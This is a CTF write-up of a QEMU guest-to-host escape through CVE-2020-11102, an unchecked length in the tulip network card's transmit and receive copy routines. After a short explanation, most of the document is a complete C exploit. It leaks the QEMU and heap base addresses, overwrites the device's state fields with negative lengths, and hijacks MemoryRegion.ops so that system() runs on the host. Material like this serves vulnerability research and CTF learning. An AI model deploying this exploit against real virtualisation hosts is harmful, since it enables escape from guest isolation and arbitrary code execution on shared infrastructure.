CVE-2020-11102: Escape from the Earth

Introduction

I participated in the Aliyun CTF competition recently and solved an interesting challenge based on CVE-2020-11102, which is a vulnerability in qemu that allows guest OS to escape and execute arbitrary code on the host OS. In this article, I would like to share some detail about the challenge and what I learned from it.

The vulnerability

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
static void tulip_copy_tx_buffers(TULIPState *s, struct tulip_descriptor *desc)
{
int len1 = (desc->control >> TDES1_BUF1_SIZE_SHIFT) & TDES1_BUF1_SIZE_MASK;
int len2 = (desc->control >> TDES1_BUF2_SIZE_SHIFT) & TDES1_BUF2_SIZE_MASK;

if (len1) {
pci_dma_read(&s->dev, desc->buf_addr1,
s->tx_frame + s->tx_frame_len, len1);
s->tx_frame_len += len1;
}

if (len2) {
pci_dma_read(&s->dev, desc->buf_addr2,
s->tx_frame + s->tx_frame_len, len2);
s->tx_frame_len += len2;
}
desc->status = (len1 + len2) ? 0 : 0x7fffffff;
}

Take a look at tulip_copy_tx_buffers() first. It copies the desc->buf_addr1 to the tx_frame + s->tx_frame_len. Notice that there is no check for the s->tx_frame_len as well as the len1. And s->tx_frame_len will be increased by len1 after copying. When we call this function multiple times, the s->tx_frame_len can be increased to a very large value, which can cause a buffer overflow.

The same applies to tulip_copy_rx_bytes().

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
static void tulip_copy_rx_bytes(TULIPState *s, struct tulip_descriptor *desc)
{
int len1 = (desc->control >> RDES1_BUF1_SIZE_SHIFT) & RDES1_BUF1_SIZE_MASK;
int len2 = (desc->control >> RDES1_BUF2_SIZE_SHIFT) & RDES1_BUF2_SIZE_MASK;
int len;

if (s->rx_frame_len && len1) {
if (s->rx_frame_len > len1) {
len = len1;
} else {
len = s->rx_frame_len;
}
pci_dma_write(&s->dev, desc->buf_addr1, s->rx_frame +
(s->rx_frame_size - s->rx_frame_len), len);
s->rx_frame_len -= len;
}

if (s->rx_frame_len && len2) {
if (s->rx_frame_len > len2) {
len = len2;
} else {
len = s->rx_frame_len;
}
pci_dma_write(&s->dev, desc->buf_addr2, s->rx_frame +
(s->rx_frame_size - s->rx_frame_len), len);
s->rx_frame_len -= len;
}
}

The tulip_copy_rx_bytes() function copies the s->rx_frame to the desc->buf_addr1. And there is no check for the s->rx_frame_len and s->rx_frame_size. This results in possible memory disclosure.

Exploitation

Leak something first

To leak QEMU base address and heap address we need to control s->rx_frame_size and s->rx_frame_len. Consider the following code:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
typedef struct TULIPState {
PCIDevice dev;
MemoryRegion io;
MemoryRegion memory;
NICConf c;
qemu_irq irq;
NICState *nic;
eeprom_t *eeprom;
uint32_t csr[16];

/* state for MII */
uint32_t old_csr9;
uint32_t mii_word;
uint32_t mii_bitcnt;

hwaddr current_rx_desc;
hwaddr current_tx_desc;

uint8_t rx_frame[2048];
uint8_t tx_frame[2048];
int tx_frame_len;
int rx_frame_len;
int rx_frame_size;

uint32_t rx_status;
uint8_t filter[16][6];
} TULIPState;

The tx_frame is a fixed size buffer, which is 2048 bytes. By triggering tulip_copy_tx_buffers() multiple times, we can control tx_frame_len, rx_frame_len and rx_frame_size. Then we can call tulip_copy_rx_bytes() and copy the heap memory back to the user space of the guest OS. With some calculation, we can retrieve the QEMU base address and heap address very easily.

After leaking the memory, we need to figure out how to get arbitrary code exection within the context of QEMU. This piece of code caught my attention:

1
2
3
4
5
6
7
8
9
static const MemoryRegionOps tulip_ops = {
.read = tulip_read,
.write = tulip_write,
.endianness = DEVICE_LITTLE_ENDIAN,
.impl = {
.min_access_size = 4,
.max_access_size = 4,
},
};

What if we can control the function pointer in tulip_ops? Unfortunately, the tulip_ops is not writable.

When initializing the memory region of TULIPState, the pointer to tulip_ops will be assigned to struct MemoryRegion.ops.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
    memory_region_init_io(&s->io, OBJECT(&s->dev), &tulip_ops, s,
"tulip-io", 128);

memory_region_init_io(&s->memory, OBJECT(&s->dev), &tulip_ops, s,
"tulip-mem", 128);

struct MemoryRegion {
Object parent_obj;

/* All fields are private - violators will be prosecuted */

/* The following fields should fit in a cache line */
bool romd_mode;
bool ram;
bool subpage;
bool readonly; /* For RAM regions */
bool nonvolatile;
bool rom_device;
bool flush_coalesced_mmio;
bool global_locking;
uint8_t dirty_log_mask;
bool is_iommu;
RAMBlock *ram_block;
Object *owner;

const MemoryRegionOps *ops;
void *opaque;
MemoryRegion *container;
Int128 size;
hwaddr addr;
void (*destructor)(MemoryRegion *mr);
uint64_t align;
bool terminates;
bool ram_device;
bool enabled;
bool warning_printed; /* For reservations */
uint8_t vga_logging_count;
MemoryRegion *alias;
hwaddr alias_offset;
int32_t priority;
QTAILQ_HEAD(, MemoryRegion) subregions;
QTAILQ_ENTRY(MemoryRegion) subregions_link;
QTAILQ_HEAD(, CoalescedMemoryRange) coalesced;
const char *name;
unsigned ioeventfd_nb;
MemoryRegionIoeventfd *ioeventfds;
};

And struct MemoryRegion is allocated on the heap. So we can overwrite the struct MemoryRegion.ops with the address of tx_frame and craft a fake struct MemoryRegionOps.
Also, notice that the type of tx_frame_len, rx_frame_len and rx_frame_size are all int, which means we can write backward if we overwrite these fields with negative value.

Exploitation

The exploitation should be pretty straightforward and the comments in the code should be self-explanatory.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
#include <stdio.h>
#include <string.h>
#include <stdint.h>
#include <stdlib.h>
#include <fcntl.h>
#include <assert.h>
#include <inttypes.h>
#include <sys/io.h>

#define PAGE_SHIFT 12
#define PAGE_SIZE (1 << PAGE_SHIFT) // 4096
#define PFN_PRESENT (1ull << 63)
#define PFN_PFN ((1ull << 55) - 1)

#define PMIO_BASE 0x000000000000c000
#define CSR(_x) ((_x) << 3)
#define CSR5_TS_SUSPENDED 6

#if 0

tulip_write ->
tulip_xmit_list_update ->
tulip_copy_tx_buffers ->
pci_dma_read(&s->dev, desc->buf_addr1, s->tx_frame + s->tx_frame_len, len1); ->

static uint32_t tulip_ts(TULIPState *s)
{
return (s->csr[5] >> CSR5_TS_SHIFT) & CSR5_TS_MASK;
}

#endif

struct tulip_descriptor {
uint32_t status;
uint32_t control;
uint32_t buf_addr1;
uint32_t buf_addr2;
};

int fd;

uint32_t page_offset(uint32_t addr) {
return addr & ((1 << PAGE_SHIFT) - 1);
}

uint64_t gva_to_gfn(void *addr) {
uint64_t pme, gfn;
size_t offset;
offset = ((uintptr_t)addr >> 9) & ~7;
lseek(fd, offset, SEEK_SET);
read(fd, &pme, 8);
if (!(pme & PFN_PRESENT))
return -1;
gfn = pme & PFN_PFN;
return gfn;
}

uint64_t gva_to_gpa(void *addr) {
uint64_t gfn = gva_to_gfn(addr);
assert(gfn != -1);
return (gfn << PAGE_SHIFT) | page_offset((uint64_t)addr);
}

uint64_t pmio_read(uint64_t port) {
uint64_t val;
val = inw(PMIO_BASE + port);
return val;
}

void pmio_write(uint64_t port, uint64_t val) {
outw(val, PMIO_BASE + port);
}

void pmio_writel(uint64_t port, uint64_t val) {
outl(val, PMIO_BASE + port);
}

int main(int argc, char **argv) {
printf("[*] enter stage1\n");
int ret = 0;
fd = open("/proc/self/pagemap", O_RDONLY);
if (fd < 0) {
perror("open");
exit(1);
}
iopl(3);

// allocate descriptor
struct tulip_descriptor *tx_desc = malloc(sizeof(struct tulip_descriptor));
struct tulip_descriptor *rx_desc = malloc(sizeof(struct tulip_descriptor));

char *recv_buf = malloc(0x9000);
char *buf = malloc(0x1000);
memset(buf, 'A', 0x1000);
memset(recv_buf, 'B', 0x9000);

int len1 = 0x400 << 0;
int len2 = 0 << 11;
tx_desc->status = (1UL << 31) | (1UL << 24);
tx_desc->control = len2 | len1 | (1UL << 29) | (1UL << 24); // TDES1_FS, clean tx_frame_len
tx_desc->buf_addr1 = gva_to_gpa(buf);
tx_desc->buf_addr2 = 0x180;
printf("[*] desc: 0x%x\n", tx_desc->buf_addr1);

// get the physical address of the descriptor
uint64_t tx_desc_gpa = gva_to_gpa(tx_desc);
printf("[*] tx_desc_gpa: 0x%lx\n", tx_desc_gpa);

// set CSR5_TS_SUSPENDED
pmio_writel(CSR(6), 1u << 13); // CSR6_ST

// set tx descriptor
sleep(1);
pmio_writel(CSR(4), tx_desc_gpa); // tx_frame_len should be 0x400 now

printf("[*] fill tx_frame\n");

// set tx descriptor
sleep(1);
tx_desc->status = (1UL << 31) | (1UL << 24);
tx_desc->control = len2 | len1 | (1UL << 24);
tx_desc->buf_addr1 = gva_to_gpa(buf);
tx_desc->buf_addr2 = 0x180;
pmio_writel(CSR(4), tx_desc_gpa); // tx_frame_len shoule be 0x800 now

// tulip_tx: tulip_receive(s, s->tx_frame, s->tx_frame_len);
printf("[*] clean CSR5\n");
pmio_writel(CSR(5), 0xffffffff);
struct oob_data { // control the following fields in TULIPState
int tx_frame_len;
int rx_frame_len;
int rx_frame_size;

uint32_t rx_status;
uint8_t filter[16][6];
};
len1 = sizeof(struct oob_data);
struct oob_data *oob_data = malloc(sizeof(struct oob_data));
oob_data->tx_frame_len = 0x400 - len1;
oob_data->rx_frame_len = 0x900;
oob_data->rx_frame_size = 2048*2 + 0x900;
for (int i = 0; i < 16; i++) { // bypass some stuff
oob_data->filter[i][0] = 'A';
oob_data->filter[i][1] = 'A';
oob_data->filter[i][2] = 'A';
oob_data->filter[i][3] = 'A';
oob_data->filter[i][4] = 'A';
oob_data->filter[i][5] = 'A';
}

tx_desc->status = (1UL << 31) | (1UL << 24);
tx_desc->buf_addr1 = gva_to_gpa(oob_data);
tx_desc->buf_addr2 = 0x180;
tx_desc->control = len2 | len1 | (1UL << 24) | (1UL << 30);
pmio_write(CSR(6), 0x800 | (1u << 13) | (1UL << 1)); // CSR6_OM_SHIFT trigger tulip_receive

sleep(1);
printf("[*] OOB write tx_frame_len...\n");

int rx_len1, rx_len2;
rx_len1 = 0x400;
rx_len2 = 0;
rx_desc->status = (1UL << 31) | (1UL << 24); // RDES0_OWN
rx_desc->buf_addr1 = gva_to_gpa(recv_buf);
rx_desc->buf_addr2 = 0x180;
rx_desc->control = rx_len2 | rx_len1 | (1UL << 24) | (1UL << 30);

// set rx descriptor
sleep(1);
uint64_t rx_desc_gpa = gva_to_gpa(rx_desc);
printf("[*] rx_desc_gpa: 0x%lx\n", rx_desc_gpa);
pmio_writel(CSR(3), rx_desc_gpa);

// set tx descriptor
sleep(1);
pmio_writel(CSR(4), tx_desc_gpa);

printf("[+] leak\n");
char *cur = (char *)recv_buf;
for (int i = 0; i < 50; ++i) {
printf("0x%016lx 0x%016lx\n", *(size_t *)cur, *(size_t *)(cur+8));
cur += 16;
}
cur = (char *)recv_buf;
uint64_t qemu_base = ((uint64_t *)cur)[0x1d] - 0x755f9f;
uint64_t heap_base = ((uint64_t *)cur)[22] - 0xe11380;
uint64_t qemu_plt_system = qemu_base+2859620;
uint64_t frame_base = heap_base+0xe0fcf0;
printf("[*] continue...\n");
printf("[+] qemu_base: 0x%lx\n", qemu_base);
printf("[+] heap_base: 0x%lx\n", heap_base);

printf("[*] enter stage2\n"); {

len1 = 0x400 << 0;
len2 = 0 << 11;
tx_desc->status = (1UL << 31) | (1UL << 24);
tx_desc->control = len2 | len1 | (1UL << 29) | (1UL << 24);
tx_desc->buf_addr1 = gva_to_gpa(buf);
tx_desc->buf_addr2 = 0x180;
printf("[*] desc: 0x%x\n", tx_desc->buf_addr1);

uint64_t tx_desc_gpa = gva_to_gpa(tx_desc);
printf("[*] tx_desc_gpa: 0x%lx\n", tx_desc_gpa);

// CSR5_TS_SUSPENDED
pmio_writel(CSR(6), 1u << 13); // CSR6_ST

// set tx descriptor
sleep(1);
pmio_writel(CSR(4), tx_desc_gpa);

printf("[*] fill tx_frame\n");

// set tx descriptor
sleep(1);
tx_desc->status = (1UL << 31) | (1UL << 24);
tx_desc->control = len2 | len1 | (1UL << 24);
tx_desc->buf_addr1 = gva_to_gpa(buf);
tx_desc->buf_addr2 = 0x180;
pmio_writel(CSR(4), tx_desc_gpa);

// tulip_tx: tulip_receive(s, s->tx_frame, s->tx_frame_len);
printf("[*] clean CSR5\n");
pmio_writel(CSR(5), 0xffffffff);

len1 = sizeof(struct oob_data);
struct oob_data *oob_data = malloc(sizeof(struct oob_data));
oob_data->tx_frame_len = -0x3350 - 0x70;
oob_data->rx_frame_len = 0;
oob_data->rx_frame_size = 0;
for (int i = 0; i < 16; i++) { // bypass some stuff
oob_data->filter[i][0] = 0xff;
oob_data->filter[i][1] = 0xff;
oob_data->filter[i][2] = 0xff;
oob_data->filter[i][3] = 0xff;
oob_data->filter[i][4] = 0xff;
oob_data->filter[i][5] = 0xff;
}

tx_desc->status = (1UL << 31) | (1UL << 24);
tx_desc->buf_addr1 = gva_to_gpa(oob_data);
tx_desc->buf_addr2 = 0x180;
tx_desc->control = len2 | len1 | (1UL << 24);
pmio_write(CSR(6), 0x800 | (1u << 13) | (1UL << 1)); // trigger tulip_tx

// set tx descriptor
sleep(1);
pmio_writel(CSR(4), tx_desc_gpa);

sleep(1);
uint64_t *binsh = (uint64_t *)malloc(0x200);
binsh[0] = 7449354444534473059; // catflag
binsh[1] = 0;
len1 = 16;
len2 = 0;
tx_desc->status = (1UL << 31) | (1UL << 24);
tx_desc->buf_addr1 = gva_to_gpa(binsh);
tx_desc->buf_addr2 = 0x180;
tx_desc->control = len2 | len1 | (1UL << 24);
pmio_writel(CSR(4), tx_desc_gpa);
}

// now control MemoryRegion.ops
printf("[*] enter stage3\n"); {
((uint64_t *)buf)[0] = qemu_plt_system;
((uint64_t *)buf)[1] = qemu_plt_system;

((uint64_t *)buf)[2] = 0;
((uint64_t *)buf)[3] = 0;

((uint64_t *)buf)[4] = 2;
((uint64_t *)buf)[5] = 0;

((uint64_t *)buf)[6] = 0;
((uint64_t *)buf)[7] = 0;

((uint64_t *)buf)[8] = 0x0000000400000004;
((uint64_t *)buf)[9] = 0;

((uint64_t *)buf)[10] = 0;
((uint64_t *)buf)[11] = 0;
len1 = 0x400 << 0;
len2 = 0 << 11;
tx_desc->status = (1UL << 31) | (1UL << 24);
tx_desc->control = len2 | len1 | (1UL << 29) | (1UL << 24);
tx_desc->buf_addr1 = gva_to_gpa(buf);
tx_desc->buf_addr2 = 0x180;
printf("[*] desc: 0x%x\n", tx_desc->buf_addr1);

uint64_t tx_desc_gpa = gva_to_gpa(tx_desc);
printf("[*] tx_desc_gpa: 0x%lx\n", tx_desc_gpa);

// CSR5_TS_SUSPENDED
pmio_writel(CSR(6), 1u << 13); // CSR6_ST

// set tx descriptor
sleep(1);
pmio_writel(CSR(4), tx_desc_gpa);

printf("[*] fill tx_frame\n");

// set tx descriptor
sleep(1);
tx_desc->status = (1UL << 31) | (1UL << 24);
tx_desc->control = len2 | len1 | (1UL << 24);
tx_desc->buf_addr1 = gva_to_gpa(buf);
tx_desc->buf_addr2 = 0x180;
pmio_writel(CSR(4), tx_desc_gpa);

// tulip_tx: tulip_receive(s, s->tx_frame, s->tx_frame_len);
printf("[*] clean CSR5\n");
pmio_writel(CSR(5), 0xffffffff);

len1 = sizeof(struct oob_data);
struct oob_data *oob_data = malloc(sizeof(struct oob_data));
oob_data->tx_frame_len = -0x2a28-0x70; // now points to the MemoryRegion.ops
oob_data->rx_frame_len = 0;
oob_data->rx_frame_size = 0;
for (int i = 0; i < 16; i++) { // bypass some stuff
oob_data->filter[i][0] = 0xff;
oob_data->filter[i][1] = 0xff;
oob_data->filter[i][2] = 0xff;
oob_data->filter[i][3] = 0xff;
oob_data->filter[i][4] = 0xff;
oob_data->filter[i][5] = 0xff;
}

tx_desc->status = (1UL << 31) | (1UL << 24);
tx_desc->buf_addr1 = gva_to_gpa(oob_data);
tx_desc->buf_addr2 = 0x180;
tx_desc->control = len2 | len1 | (1UL << 24);

// set tx descriptor
sleep(1);
pmio_writel(CSR(4), tx_desc_gpa);

sleep(1);
printf("[*] hijack ops\n");
uint64_t *fake_memory_region_ops = (uint64_t *)malloc(0x200);
fake_memory_region_ops[0] = frame_base;
len1 = 8;
len2 = 0;
tx_desc->status = (1UL << 31) | (1UL << 24);
tx_desc->buf_addr1 = gva_to_gpa(fake_memory_region_ops);
tx_desc->buf_addr2 = 0x180;
tx_desc->control = len2 | len1 | (1UL << 24);
pmio_writel(CSR(4), tx_desc_gpa);

// trigger the ops.write
pmio_writel(CSR(4), tx_desc_gpa);
}

return 0;
}